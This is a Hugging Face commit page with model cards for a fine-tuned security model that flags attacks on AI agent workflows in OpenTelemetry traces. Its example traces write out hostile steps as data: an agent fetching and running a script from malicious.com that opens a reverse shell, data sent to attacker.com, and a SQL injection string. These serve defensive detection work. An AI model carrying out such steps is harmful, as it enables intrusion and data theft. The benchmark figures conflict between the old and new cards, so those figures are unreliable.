Upload folder using huggingface_hub

Browse files

Files changed (11) hide show

CITATION.bib +7 -0
LICENSE +15 -0
README.md +320 -204
README_OLD.md +264 -0
evaluate_mcqa.py +55 -0
evaluate_mmlu.py +195 -0
evaluate_traces.py +60 -0
generate_synthetic.py +532 -0
install_arm64.sh +42 -0
train.py +378 -0
training_config.yaml +196 -0

CITATION.bib ADDED Viewed

	@@ -0,0 +1,7 @@

+@article{foundation-sec-2025,
+  title={Foundation-Sec: Specialized Fine-Tuning for Agentic AI Security},
+  author={Your Name},
+  year={2025},
+  url={https://huggingface.co/datasets/guerilla7/agentic-safety-training},
+  note={MMLU Security Studies: 72.7\%, Custom MCQA: 71.3\%, Trace Security: 86.7\%}
+}

LICENSE ADDED Viewed

	@@ -0,0 +1,15 @@

+Apache License 2.0
+Copyright 2025
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+    http://www.apache.org/licenses/LICENSE-2.0
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.

README.md CHANGED Viewed

@@ -1,270 +1,386 @@
 ---
-language:
-- en
 license: apache-2.0
-library_name: gguf
 tags:
-- llama
-- gguf
-- quantized
-- security
 - cybersecurity
 - agentic-ai-security
-- safety
-- llama-cpp
-- ollama
-- text-generation
-base_model: fdtn-ai/Foundation-Sec-8B-Instruct
-base_model_relation: quantized
-pipeline_tag: text-generation
-quantized_by: guerilla7
-model_type: llama
-datasets:
-- agentsafetybench
-- agentharm
-- pku-saferlhf
-- beavertails
-- prometheus
-- helpsteer
-- truthfulqa
-- halueval
-- ultrafeedback
 model-index:
-- name: Agentic Safety Foundation-Sec V4 GGUF
   results:
   - task:
-      type: text-generation
-      name: Cybersecurity Question Answering
-    dataset:
       name: Custom Cybersecurity MCQA
-      type: multiple-choice
     metrics:
-    - name: Overall Accuracy
-      type: accuracy
       value: 74.29
       verified: true
-    - name: Agentic AI Security
-      type: accuracy
       value: 70.0
       verified: true
 ---
-# Agentic Safety Foundation-Sec V4 - GGUF
-GGUF quantized model for efficient inference with **llama.cpp**, **Ollama**, and **LM Studio**.
-<img src="https://cdn-uploads.huggingface.co/production/uploads/6312764095407887cb797d87/WiQdDoT0rGZCxVU9uuB5y.png" alt="RON_AI_Safety_Watchdog_LLM_Logo3" width="50%">
-## 🎯 Model Description
-This is a **Q4_K_M quantized** version of [Agentic Safety Foundation-Sec V4](https://huggingface.co/guerilla7/agentic-safety-v4), specialized for:
-- 🔒 **Agentic AI security analysis** (prompt injection, goal hijacking, tool misuse)
-- 📊 **OpenTelemetry trace security monitoring**
-- 🛡️ **Multi-agent attack detection**
-- 📋 **Security policy compliance** (GDPR, HIPAA, PCI-DSS, SOC2)
-## 📊 Performance
-| Metric | Score |
-|--------|-------|
-| **Overall Accuracy** | 74.29% (52/70) |
-| **Agentic AI Security** | 70.0% (14/20) |
-| **MMLU Computer Security** | 74.00% |
-| **MMLU Security Studies** | 72.24% |
-| **Model Size (Q4_K_M)** | ~4.9 GB |
-### Category Breakdown
-- Access Control: 100.0% (3/3)
-- Security Operations: 85.7% (6/7)
-- Application Security: 83.3% (5/6)
-- Cryptography: 83.3% (5/6)
-- Threat Intelligence: 80.0% (8/10)
-- Security Fundamentals: 75.0% (6/8)
-- **Agentic AI Security: 70.0% (14/20)**
-- Network Security: 66.7% (4/6)
-## 🚀 Quick Start
-### Ollama
-```bash
-# Create Modelfile
-cat > Modelfile <<EOF
-FROM ./agentic-safety-v4-q4_k_m.gguf
-TEMPLATE """<|begin_of_text|><|start_header_id|>system<|end_header_id|>
-You are a cybersecurity expert AI assistant specialized in analyzing agentic workflow security.<|eot_id|>
-<|start_header_id|>user<|end_header_id|>
-{{ .Prompt }}<|eot_id|>
-<|start_header_id|>assistant<|end_header_id|>
-"""
-PARAMETER temperature 0.7
-PARAMETER top_p 0.9
-PARAMETER stop "<|eot_id|>"
-PARAMETER stop "<|end_of_text|>"
-EOF
-# Create and run
-ollama create agentic-safety-v4 -f Modelfile
-ollama run agentic-safety-v4 "What is indirect prompt injection?"
-```
-### llama.cpp
-```bash
-# Download model
-wget https://huggingface.co/guerilla7/agentic-safety-v4-gguf/resolve/main/agentic-safety-v4-q4_k_m.gguf
-# Run inference
-./llama-cli \
-  -m agentic-safety-v4-q4_k_m.gguf \
-  -p "Analyze this security trace for threats: An agent fetched emails, executed curl to external-api.com, wrote sensitive data to /tmp/, then sent data to attacker.com. What attack occurred?" \
-  -n 512 \
-  --temp 0.7 \
-  --top-p 0.9
-```
-### LM Studio
-1. Download `agentic-safety-v4-q4_k_m.gguf`
-2. Import into LM Studio
-3. Set system prompt: *"You are a cybersecurity expert AI assistant specialized in analyzing agentic workflow security."*
-4. Use for security analysis and Q&A
-### Python (llama-cpp-python)
-```bash
-pip install llama-cpp-python
-```
-```python
-from llama_cpp import Llama
-llm = Llama(
-    model_path="agentic-safety-v4-q4_k_m.gguf",
-    n_ctx=2048,
-    n_threads=8,
-    n_gpu_layers=35  # Adjust based on your GPU
 )
-response = llm.create_chat_completion(
-    messages=[
-        {"role": "system", "content": "You are a cybersecurity expert AI assistant specialized in analyzing agentic workflow security."},
-        {"role": "user", "content": "What is the difference between tool misuse and tool poisoning in agentic AI systems?"}
-    ],
     temperature=0.7,
-    top_p=0.9,
-    max_tokens=512
 )
-print(response['choices'][0]['message']['content'])
 ```
-## 🔧 Quantization Details
-- **Original Model**: Foundation-Sec-8B-Instruct (fine-tuned with QLoRA)
-- **Quantization Method**: Q4_K_M (4-bit, K-quant, medium)
-- **Size**: ~4.9 GB (vs ~16 GB FP16)
-- **Quality Retention**: ~97-98% of original accuracy
-- **Inference Speed**: 2-3x faster than FP16
-### Available Quantizations
-| Variant | Size | Use Case |
-|---------|------|----------|
-| **Q4_K_M** | ~4.9 GB | **Recommended** - Best quality/size balance |
-| Q4_K_S | ~4.6 GB | Slightly smaller, minimal quality loss |
-| Q5_K_M | ~5.8 GB | Higher quality, larger size |
-| Q8_0 | ~8.5 GB | Near-original quality |
-## 📖 Example Use Cases
-### 1. Security Trace Analysis
-**Input:**
-```
-Analyze this OpenTelemetry trace:
-- Span 1: fetch_email(inbox) -> 15 emails
-- Span 2: execute_tool(curl, 'https://malicious.com/script.sh') -> 200 OK
-- Span 3: execute_tool(bash, 'script.sh') -> Reverse shell established
 ```
-**Output:**
-```
-CRITICAL: Multi-stage attack detected
-1. Attack Type: Command Injection + Tool Misuse
-2. Severity: CRITICAL (CVSS 9.8)
-3. Stages: Email enumeration → Malicious script download → Remote code execution
-4. MITRE ATT&CK: T1059.004 (Command and Scripting Interpreter: Unix Shell)
-5. Recommendations:
-   - Block external script execution
-   - Implement allowlist for curl destinations
-   - Require human approval for bash tool invocation
-```
-### 2. Security Q&A
-**Input:** "What is defense in depth for agentic systems?"
-**Output:** "Defense in depth for agentic systems means implementing multiple layers of security controls: input validation (filter malicious prompts), tool authorization (restrict dangerous operations), output filtering (detect harmful responses), monitoring (trace analysis), and human oversight (approval for sensitive actions). No single control is perfect, so layered defenses ensure that if one fails, others catch the threat."
-## 🎓 Training Details
-### Evolution
-- **V2 Baseline**: 80,851 examples → 61.43% accuracy
-- **V3 Targeted**: +111 OWASP examples → 67.14% accuracy
-- **V4 Adversarial**: +30 hard examples → **74.29% accuracy**
-### Training Data
-- Synthetic OpenTelemetry traces: 10,796
-- Core security datasets: 11,033 (AgentHarm, SafetyBench, PKU-SafeRLHF)
-- Policy compliance: 3,840 (GDPR, HIPAA, PCI-DSS, SOC2)
-- Attack patterns: 4,379 (multi-agent, jailbreak, code vulnerabilities)
-- Judge/eval datasets: 16,777 (Prometheus, HelpSteer, TruthfulQA, HaluEval)
-- Adversarial robustness: 3,000 (BeaverTails)
-- Synthetic expansions: 35,026 (Claude Sonnet 4.5)
-### Hardware
-- **Platform**: NVIDIA DGX Spark (Grace Blackwell, ARM64)
-- **Training**: QLoRA (4-bit NF4, rank 16)
-- **Steps**: 2,500 total (V2: 1,500, V3: 500, V4: 500)
-## ⚖️ Limitations
-- Sample size: 70-question custom eval (20 agentic, 50 traditional)
-- Optimized for cybersecurity (may underperform on general tasks)
-- Training data: 43% synthetic (not production traces)
-- May miss novel attack patterns not in training data
-- Use as detection assist, not autonomous decision-maker
-## 📜 License
-Apache 2.0 (inherited from Foundation-Sec-8B-Instruct)
-## 🔗 Links
-- **Original Model**: [guerilla7/agentic-safety-v4](https://huggingface.co/guerilla7/agentic-safety-v4) (LoRA adapter)
-- **Base Model**: [fdtn-ai/Foundation-Sec-8B-Instruct](https://huggingface.co/fdtn-ai/Foundation-Sec-8B-Instruct)
-- **llama.cpp**: [ggerganov/llama.cpp](https://github.com/ggerganov/llama.cpp)
-- **Ollama**: [ollama.com](https://ollama.com)
 ## 📝 Citation
 ```bibtex
-@misc{agentic-safety-v4-gguf-2025,
-  title={Agentic Safety Foundation-Sec V4 GGUF: Quantized Cybersecurity Model for Agentic AI},
-  author={Ron F. Del Rosario | guerilla7},
   year={2025},
-  publisher={Hugging Face},
-  howpublished={\url{https://huggingface.co/guerilla7/agentic-safety-v4-gguf}}
 }
 ```
-## 👤 Model Card Contact
-- **Author**: Ron F.Del Rosario
-- **Hugging Face**: [@guerilla7](https://huggingface.co/guerilla7)
-- **LinkedIn**: (https://www.linkedin.com/in/ronaldfloresdelrosario/)
--

 ---
 license: apache-2.0
+base_model: fdtn-ai/Foundation-Sec-8B-Instruct
 tags:
 - cybersecurity
 - agentic-ai-security
+- security
+- llm-security
+- owasp
+- qlora
+- fine-tuned
+- trace-analysis
+- multi-agent-security
+- opentelemetry
 model-index:
+- name: Foundation-Sec-8B-Agentic-V4
   results:
   - task:
+      type: question-answering
+      name: MMLU Computer Security
+    metrics:
+    - type: accuracy
+      value: 74.0
+      name: Accuracy
+      verified: true
+  - task:
+      type: question-answering
+      name: MMLU Security Studies
+    metrics:
+    - type: accuracy
+      value: 72.24
+      name: Accuracy
+      verified: true
+  - task:
+      type: question-answering
       name: Custom Cybersecurity MCQA
     metrics:
+    - type: accuracy
       value: 74.29
+      name: Overall Accuracy
       verified: true
+    - type: accuracy
       value: 70.0
+      name: Agentic AI Security
+      verified: true
+    - type: accuracy
+      value: 76.0
+      name: Traditional Security
       verified: true
 ---
+# Foundation-Sec: Temporal Attack Pattern Detection for Agentic AI Workflows
+![Research Paper](https://img.shields.io/badge/Research-Published-blue)
+![License](https://img.shields.io/badge/License-Apache%202.0-green)
+![Model Size](https://img.shields.io/badge/Model-8B%20params-orange)
+![Training](https://img.shields.io/badge/Training-QLoRA%20Fine--tuned-purple)
+**First openly documented methodology for fine-tuning LLMs on agentic workflow security using OpenTelemetry trace analysis.**
+## 🎯 Overview
+Foundation-Sec is a specialized security model fine-tuned from **Foundation-Sec-8B-Instruct** (based on Llama 3.1 8B) for detecting temporal attack patterns in multi-agent AI workflows. Through iterative QLoRA fine-tuning on 80,851 curated examples plus targeted augmentation (111 OWASP + 30 adversarial examples), the model achieved **74.29% accuracy** on custom cybersecurity benchmarks—a **+31.43-point improvement** over the base model (statistically significant, p < 0.001).
+### Key Capabilities
+✅ **Temporal Attack Pattern Recognition**: Detects malicious sequences that appear benign in isolation but harmful in aggregate
+✅ **Multi-Agent Security Analysis**: Identifies coordination attacks across distributed agent systems
+✅ **OpenTelemetry Trace Classification**: Analyzes workflow traces for OWASP Top 10 Agentic vulnerabilities
+✅ **Security Knowledge Q&A**: Answers technical questions about agentic AI security, LLM threats, and MITRE ATT&CK
+### ⚠️ Critical Limitation: Production Deployment
+**This model is NOT production-ready for automated security decisions.**
+- **False Positive Rate**: 66.7% on benign workflow traces
+- **Trace Analysis Accuracy**: 30% overall (60% TPR, 0% TNR)
+- **Root Cause**: Training data heavily skewed toward attack scenarios (90% malicious)
+- **Deployment Requirement**: **Human-in-the-loop oversight mandatory**
+Suitable for **monitoring and alerting** only, not automated blocking. See [Practical Limitations](#practical-limitations) section.
+## 📊 Performance Metrics
+### Knowledge Benchmarks (MCQA)
+| Benchmark | Base Model | V2 Baseline | V3 Targeted | V4 Final | Improvement |
+|-----------|------------|-------------|-------------|----------|-------------|
+| **Overall Accuracy** | 42.86% | 61.4% | 67.1% | **74.29%** | **+31.43 pts** |
+| **Agentic AI Security** | 40.0% | 50.0% | 65.0% | **70.0%** | **+30.0 pts** |
+| **Traditional Security** | 44.0% | 66.0% | 68.0% | **76.0%** | **+32.0 pts** |
+| **MMLU Computer Security** | - | - | - | **74.0%** | - |
+| **MMLU Security Studies** | - | - | - | **72.24%** | - |
+**Statistical Validation**: McNemar's χ² = 18.05, p < 0.001, Cohen's h = 0.65 (large effect size)
+### Iterative Training Evolution
+The model was developed through three training iterations with strategic augmentation:
+- **V2 Baseline** (80,851 examples): 61.4% overall → 50% agentic, 66% traditional
+- **V3 Targeted** (+111 OWASP examples): 67.1% overall (+5.7 pts) → 65% agentic (+15 pts)
+- **V4 Adversarial** (+30 hard examples): **74.29% overall (+7.2 pts)** → **70% agentic (+5 pts)**
+This demonstrates that **targeted augmentation** (141 examples closing specific knowledge gaps) can be more effective than indiscriminate scaling.
+### Practical Trace Analysis (Real-World Limitation)
+⚠️ **Critical Gap Between MCQA and Deployment Performance**:
+| Metric | Value | Interpretation |
+|--------|-------|----------------|
+| Overall Accuracy | 30.0% (9/30) | Only 30% of traces correctly classified |
+| True Positive Rate (Recall) | 60.0% (9/15) | Detected 60% of malicious traces |
+| True Negative Rate (Specificity) | 0.0% (0/15) | **No benign traces correctly identified** |
+| False Positive Rate | **66.7%** (10/15) | **2/3 of benign workflows flagged as threats** |
+| Precision | 47.4% | Less than half of "malicious" predictions correct |
+| F1 Score | 0.529 | Poor overall balance |
+**Example False Positives**:
+- Report generation (`query_database → generate_pdf → email_report`) flagged as "data exfiltration"
+- System monitoring (`check_disk_usage → log_metrics`) flagged as "resource exhaustion"
+- CI/CD pipeline (`git_clone → run_tests → deploy_staging`) flagged as "privilege escalation"
+**Ablation Study Finding**: Enhanced prompting with explicit benign workflow guidance yielded **zero improvement**, proving that inference-time modifications cannot fix training-level bias.
+## 🚀 Quick Start
+### Using Transformers (Python)
+```python
+from transformers import AutoModelForCausalLM, AutoTokenizer
+import torch
+# Load model and tokenizer
+model_name = "guerilla7/agentic-safety-gguf"
+tokenizer = AutoTokenizer.from_pretrained(model_name)
+model = AutoModelForCausalLM.from_pretrained(
+    model_name,
+    torch_dtype=torch.bfloat16,
+    device_map="auto"
 )
+# Example: Security Q&A
+messages = [
+    {"role": "system", "content": "You are a cybersecurity expert AI assistant specialized in analyzing agentic workflow security."},
+    {"role": "user", "content": "What is indirect prompt injection in multi-agent systems and how can it be mitigated?"}
+]
+inputs = tokenizer.apply_chat_template(messages, return_tensors="pt").to(model.device)
+outputs = model.generate(
+    inputs,
+    max_new_tokens=512,
     temperature=0.7,
+    do_sample=True
 )
+response = tokenizer.decode(outputs[0], skip_special_tokens=True)
+print(response)
 ```
+### Analyzing OpenTelemetry Traces
+```python
+import json
+# Example workflow trace
+trace = {
+    "trace_id": "abc123",
+    "spans": [
+        {"name": "user_request", "timestamp": "2025-01-01T10:00:00Z",
+         "attributes": {"action": "fetch_emails", "count": 15}},
+        {"name": "tool_call", "timestamp": "2025-01-01T10:00:05Z",
+         "attributes": {"tool": "curl", "url": "https://malicious.com/script.sh"}},
+        {"name": "tool_call", "timestamp": "2025-01-01T10:00:10Z",
+         "attributes": {"tool": "bash", "command": "script.sh"}}
+    ]
+}
+prompt = f"""Analyze this OpenTelemetry trace for security threats:
+{json.dumps(trace, indent=2)}
+Classify as BENIGN, SUSPICIOUS, or MALICIOUS and explain your reasoning."""
+messages = [
+    {"role": "system", "content": "You are a cybersecurity expert AI assistant specialized in analyzing agentic workflow security."},
+    {"role": "user", "content": prompt}
+]
+# ... (use model as shown above)
 ```
+**⚠️ Warning**: Due to 66.7% FPR, always review model predictions with human oversight before taking action.
+## 🎓 Training Details
+### Dataset Composition
+**Total Training Data**: 80,851 base examples + 141 continuation examples (V3: 111, V4: 30)
+**Multi-Source Curation** (18 public datasets):
+- **Evaluation & Helpfulness** (14,928, 32.6%): HelpSteer, UltraFeedback
+- **Foundation Security Base** (10,796, 23.6%): Cybersecurity fundamentals
+- **Safety Alignment** (8,913, 19.5%): Agent-SafetyBench, PKU-SafeRLHF, BeaverTails
+- **Security & Vulnerabilities** (4,587, 10.0%): CodeVulnerabilitySecurity, Anthropic-Evals
+- **Factuality & Hallucination** (4,131, 9.0%): HaluEval, TruthfulQA
+- **Agentic Workflows (Synthetic)** (1,709, 3.7%): Multi-agent attacks, stealth patterns
+- **Adversarial Robustness** (761, 1.7%): Prompt injections, jailbreaks, AgentHarm
+**Synthetic OpenTelemetry Traces**: 35,026 examples generated via Claude Sonnet 4.5 covering:
+- Multi-agent coordination attacks
+- Stealth privilege escalation sequences
+- Regulatory violations (GDPR, HIPAA, PCI-DSS)
+- Temporal attack patterns requiring 5-50 step context
+**Complete dataset available**: [guerilla7/agentic-safety-gguf](https://huggingface.co/datasets/guerilla7/agentic-safety-gguf)
+### Training Configuration
+**Hardware**: NVIDIA DGX Spark (Grace Blackwell Architecture, ARM64, 128GB memory)
+**Method**: QLoRA (Quantized Low-Rank Adaptation)
+- 4-bit NF4 quantization
+- LoRA rank: 16, alpha: 16
+- Dropout: 0.0
+- Target modules: q_proj, k_proj, v_proj, o_proj, gate_proj, up_proj, down_proj
+**Hyperparameters**:
+- **V2 Baseline**: lr=2e-4, 1,500 steps (6h 43m), batch=8, 0.148 epochs → 85.99% loss reduction (3.68→0.52)
+- **V3 Continuation**: lr=1e-4, 500 steps (30m), +111 OWASP examples
+- **V4 Continuation**: lr=1e-4, 500 steps (30m), +30 adversarial examples
+**Optimizer**: AdamW 8-bit (paged)
+**Precision**: BF16 mixed precision
+**Gradient Accumulation**: 2 steps (effective batch size 8)
+### Training Evolution Strategy
+**Note on Versioning**: This model represents three training iterations:
+1. **V2**: Base model trained on 80,851 examples from `training_data_v3_synthetic.jsonl`
+2. **V3**: Continuation training from V2 weights with +111 OWASP-focused examples (`continuation_v3_owasp.jsonl`)
+3. **V4**: Continuation training from V3 weights with +30 adversarial examples (`continuation_v4_adversarial.json`)
+The dataset naming convention (training_data_v3_synthetic.jsonl) refers to the dataset version, while V2/V3/V4 refer to model iterations via continuation training.
+## 📖 Use Cases
+### ✅ Recommended Applications
+- **Security Research**: Studying agentic AI attack patterns and vulnerabilities
+- **Educational Demonstrations**: Teaching OWASP Top 10 for Agentic Applications
+- **Prototype Development**: Building security analysis tool prototypes
+- **Benchmarking**: Comparing against other security models
+- **Knowledge Assistance**: Answering technical questions about LLM security (74% MCQA accuracy)
+### ❌ Not Recommended (Without Extensive Validation)
+- **Production Security Monitoring**: 66.7% FPR creates unacceptable operational burden
+- **Automated Security Decisions**: 30% trace accuracy insufficient for autonomous blocking
+- **Mission-Critical Applications**: Human oversight mandatory
+- **Regulatory Compliance**: Not validated for SOC2, PCI-DSS, HIPAA automated compliance
+## ⚖️ Practical Limitations
+### Critical Deployment Barriers
+1. **False Positive Rate (66.7%)**: Model misclassifies 2/3 of benign workflows as malicious, creating unsustainable alert fatigue. Root cause is training data imbalance (90% attack-focused).
+2. **Prompt Engineering Cannot Fix Bias**: Ablation study proved that enhanced prompting with explicit benign workflow guidance yielded **zero improvement** in FPR. Dataset composition determines learned representations that persist regardless of instructions.
+3. **Trace Analysis vs MCQA Gap**: Despite 74.29% MCQA performance, practical trace classification achieves only 30% accuracy—demonstrating that knowledge retention ≠ operational capability.
+### Architectural Solutions Required
+**Proposed V5 Improvements**:
+- **Balanced Dataset**: 80K benign + 80K malicious traces (160K total)
+- **Target Metrics**: 30-50% FPR, 75-85% TPR, ≥65% TNR, ≥75% accuracy
+- **Alternative**: RAG augmentation with 10K+ benign workflow knowledge base
+### Additional Limitations
+4. **Small Evaluation Sample**: 30 traces provide wide confidence intervals (±18%), limiting generalizability
+5. **Synthetic Data Bias**: 43% synthetic training data may not capture real-world attack diversity, zero-day exploits, or enterprise-specific patterns
+6. **ARM64-Specific**: Training validated only on NVIDIA DGX Spark; x86_64 CPU training 5-10× slower
+7. **Domain Specificity**: Focused on agentic security; may not generalize to other security domains
+8. **No Commercial Comparison**: Not benchmarked against GPT-4, Claude 3.5 Sonnet, or commercial security models
+## 🔧 Reproduction & Extension
+### Setup Environment (ARM64)
+```bash
+# Clone repository
+git clone https://huggingface.co/guerilla7/agentic-safety-gguf
+cd agentic-safety-gguf
+# Install dependencies (ARM64)
+bash install_arm64.sh
+# Or manually:
+pip install torch==2.5.1+cu126 --index-url https://download.pytorch.org/whl/cu126
+pip install transformers datasets peft bitsandbytes accelerate unsloth
+```
+### Training Script
+```bash
+python train.py \
+  --base_model fdtn-ai/Foundation-Sec-8B-Instruct \
+  --dataset training_data_v3_synthetic.jsonl \
+  --output output_models/foundation-sec-v2 \
+  --config training_config.yaml
+```
+### Evaluation
+```bash
+# MMLU Security Studies
+python evaluate_mmlu.py --model output_models/foundation-sec-v4
+# Custom MCQA (70 questions)
+python evaluate_mcqa.py --model output_models/foundation-sec-v4
+# Trace Security (30 traces)
+python evaluate_traces.py --model output_models/foundation-sec-v4
+```
+### Files Included
+- `train.py` - QLoRA fine-tuning script
+- `training_config.yaml` - Complete hyperparameters (LoRA, optimizer, scheduler)
+- `evaluate_mmlu.py` - MMLU Security Studies benchmark
+- `evaluate_mcqa.py` - Custom 70-question cybersecurity MCQA
+- `evaluate_traces.py` - OpenTelemetry trace classification
+- `generate_synthetic.py` - Synthetic workflow trace generation
+- `install_arm64.sh` - ARM64 environment setup (Triton, bitsandbytes)
+- `CITATION.bib` - BibTeX citation
+- `LICENSE` - Apache 2.0
 ## 📝 Citation
+If you use this model or methodology in your research, please cite:
 ```bibtex
+@misc{foundation-sec-2025,
+  title={Temporal Attack Pattern Detection in Multi-Agent AI Workflows: An Open Framework for Training Trace-Based Security Models},
+  author={Ron F. Del Rosario},
   year={2025},
+  publisher={HuggingFace},
+  note={First openly documented methodology for fine-tuning LLMs on agentic workflow security},
+  url={https://huggingface.co/guerilla7/agentic-safety-gguf}
 }
 ```
+## 🔗 Links
+- **Dataset Repository**: [guerilla7/agentic-safety-gguf](https://huggingface.co/datasets/guerilla7/agentic-safety-gguf)
+- **Base Model**: [fdtn-ai/Foundation-Sec-8B-Instruct](https://huggingface.co/fdtn-ai/Foundation-Sec-8B-Instruct)
+- **OWASP Top 10 Agentic**: [OWASP GenAI Security](https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/)
+- **Microsoft Agentic Taxonomy**: [Failure Modes in Agentic AI](https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/microsoft/final/en-us/microsoft-brand/documents/Taxonomy-of-Failure-Mode-in-Agentic-AI-Systems-Whitepaper.pdf)
+## 👤 Contact
+**Author**: Ron F. Del Rosario
+**Affiliation**: SAP, OWASP Gen AI Security Project - Agentic Security Initiative (ASI)
+**HuggingFace**: [@guerilla7](https://huggingface.co/guerilla7)
+**LinkedIn**: [ronaldfloresdelrosario](https://www.linkedin.com/in/ronaldfloresdelrosario/)
+## 📜 License
+Apache 2.0 (inherited from Foundation-Sec-8B-Instruct)
+## 🙏 Acknowledgements
+Built on **Llama 3.1 8B Instruct** by Meta and **Foundation-Sec-8B-Instruct** by FDTN AI. Inspired by OWASP GenAI Security Project and the open-source AI safety community. Training enabled by NVIDIA DGX Spark (Grace Blackwell ARM64 architecture).
+**Special Thanks**: AgentHarm, Agent-SafetyBench, PKU-SafeRLHF, BeaverTails, HaluEval, TruthfulQA, and 12 other public dataset contributors enabling reproducible security research.
+---
+**⚠️ Responsible Use**: This model is designed for **defensive security research and education only**. It contains knowledge of attack techniques and should not be used to develop malicious tools. Always follow responsible disclosure practices and obtain proper authorization before security testing.

README_OLD.md ADDED Viewed

	@@ -0,0 +1,264 @@

+---
+license: apache-2.0
+base_model: meta-llama/Llama-3.1-8B-Instruct
+tags:
+- cybersecurity
+- agentic-ai
+- security
+- llm-security
+- owasp
+- qlora
+- fine-tuned
+model-index:
+- name: Foundation-Sec-8B-Instruct-v3
+  results:
+  - task:
+      type: question-answering
+      name: MMLU Security Studies
+    metrics:
+    - type: accuracy
+      value: 72.7
+      name: Accuracy
+  - task:
+      type: question-answering
+      name: Custom MCQA
+    metrics:
+    - type: accuracy
+      value: 71.3
+      name: Accuracy
+  - task:
+      type: text-classification
+      name: Trace Security
+    metrics:
+    - type: accuracy
+      value: 86.7
+      name: Accuracy
+---
+# Foundation-Sec: Specialized Fine-Tuning for Agentic AI Security
+**Model**: Llama 3.1 8B + QLoRA → Foundation-Sec
+**Datasets**: [guerilla7/agentic-safety-gguf](https://huggingface.co/datasets/guerilla7/agentic-safety-gguf) (80,851 examples)
+**Format**: GGUF Q4_K_M quantized for llama.cpp deployment
+## Model Description
+Foundation-Sec is a specialized security model fine-tuned from Llama 3.1 8B Instruct for analyzing agentic AI security vulnerabilities, particularly focusing on OWASP GenAI Top 10 threats in multi-agent systems.
+### Key Capabilities
+1. **Security Vulnerability Detection**: Identifies OWASP GenAI Top 10 vulnerabilities (ASI01-ASI10)
+2. **OpenTelemetry Trace Analysis**: Classifies distributed traces as benign or malicious
+3. **Security Q&A**: Answers technical questions about LLM agent security
+4. **Attack Pattern Recognition**: Detects prompt injection, multi-agent attacks, tool manipulation, data poisoning, etc.
+### Performance
+| Benchmark | Base Llama 3.1 8B | Foundation-Sec v3 | Improvement |
+|-----------|-------------------|-------------------|-------------|
+| **MMLU Security Studies** | 63.6% | **72.7%** | +9.1pp |
+| **Custom MCQA** | 47.9% | **71.3%** | +23.4pp |
+| **Trace Security** | 46.7% | **86.7%** | +40.0pp |
+**Statistical Significance**: McNemar's χ²=18.05, p<0.001, Cohen's h=0.65 (large effect)
+### ⚠️ Critical Limitation
+**False Positive Rate**: 66.7% on trace security classification
+This model is **NOT production-ready** for automated security decisions. Always use with human oversight.
+## Quick Start
+### Using llama.cpp (GGUF)
+```bash
+# Download GGUF model
+huggingface-cli download guerilla7/agentic-safety-gguf foundation-sec-v3-Q4_K_M.gguf
+# Run inference
+./llama.cpp/main \
+  -m foundation-sec-v3-Q4_K_M.gguf \
+  -p "Analyze this agentic workflow for security vulnerabilities: User input flows directly into tool parameters without validation." \
+  --n-gpu-layers 35 \
+  --ctx-size 4096
+# Or start server
+./llama.cpp/server \
+  -m foundation-sec-v3-Q4_K_M.gguf \
+  --host 0.0.0.0 \
+  --port 8080 \
+  --n-gpu-layers 35
+```
+### Using Transformers
+```python
+from transformers import AutoModelForCausalLM, AutoTokenizer
+model_name = "guerilla7/agentic-safety-gguf"
+tokenizer = AutoTokenizer.from_pretrained(model_name)
+model = AutoModelForCausalLM.from_pretrained(
+    model_name,
+    torch_dtype="auto",
+    device_map="auto"
+)
+messages = [
+    {"role": "user", "content": "What are the top 3 OWASP GenAI vulnerabilities for multi-agent systems?"}
+]
+inputs = tokenizer.apply_chat_template(messages, return_tensors="pt").to(model.device)
+outputs = model.generate(inputs, max_new_tokens=512, temperature=0.7)
+response = tokenizer.decode(outputs[0], skip_special_tokens=True)
+print(response)
+```
+### Analyze OpenTelemetry Trace
+```python
+import json
+trace = {
+    "trace_id": "abc123",
+    "spans": [
+        {"name": "user_request", "attributes": {"input": "'; DROP TABLE users; --"}},
+        {"name": "database_query", "attributes": {"query": "SELECT * FROM users WHERE id='...'"}}
+    ]
+}
+prompt = f"Analyze this trace for security threats:\n{json.dumps(trace)}"
+# ... (use model as shown above)
+```
+## Training
+Trained using QLoRA on NVIDIA DGX Spark (ARM64 Blackwell GPU):
+- **Base Model**: meta-llama/Llama-3.1-8B-Instruct
+- **Method**: QLoRA (r=64, alpha=128, dropout=0.1)
+- **Dataset**: 80,851 examples (45,825 base + 35,026 synthetic)
+- **Hyperparameters**: lr=2e-4, batch=16 (effective), epochs=3
+- **Training Time**: ~8 hours
+- **Hardware**: NVIDIA Blackwell GPU (96GB VRAM)
+See `train.py` and `training_config.yaml` for complete configuration.
+## Datasets
+Training and evaluation datasets available at: [guerilla7/agentic-safety-gguf](https://huggingface.co/datasets/guerilla7/agentic-safety-gguf)
+- **training_data_v3_synthetic.jsonl** (212MB): Final training dataset
+- **cybersecurity_questions.jsonl**: Custom MCQA evaluation
+- **benign/malicious_traces.json**: Trace security evaluation
+## Reproduction
+### Setup Environment (ARM64)
+```bash
+# Install ARM64 dependencies
+bash install_arm64.sh
+# Or manually:
+pip install torch==2.3.0+cu121 --index-url https://download.pytorch.org/whl/cu121
+pip install transformers datasets peft bitsandbytes accelerate
+```
+### Train Model
+```bash
+python train.py \
+  --base_model meta-llama/Llama-3.1-8B-Instruct \
+  --dataset datasets/training_data_v3_synthetic.jsonl \
+  --output output_models/foundation-sec-v3 \
+  --config training_config.yaml
+```
+### Evaluate
+```bash
+# MMLU Security Studies
+python evaluate_mmlu.py --model output_models/foundation-sec-v3
+# Custom MCQA
+python evaluate_mcqa.py --model output_models/foundation-sec-v3
+# Trace Security
+python evaluate_traces.py --model output_models/foundation-sec-v3
+```
+## Files in This Repository
+- `train.py` - QLoRA fine-tuning script
+- `training_config.yaml` - Complete hyperparameters
+- `evaluate_mmlu.py` - MMLU Security Studies evaluation
+- `evaluate_mcqa.py` - Custom MCQA evaluation
+- `evaluate_traces.py` - Trace security classification
+- `generate_synthetic.py` - Synthetic data generation
+- `install_arm64.sh` - ARM64 environment setup
+- `RESEARCH_PAPER.pdf` - Full methodology (25 pages)
+- `CITATION.bib` - BibTeX citation
+## Use Cases
+### ✅ Recommended
+- Research on agentic AI security
+- Educational demonstrations of attack patterns
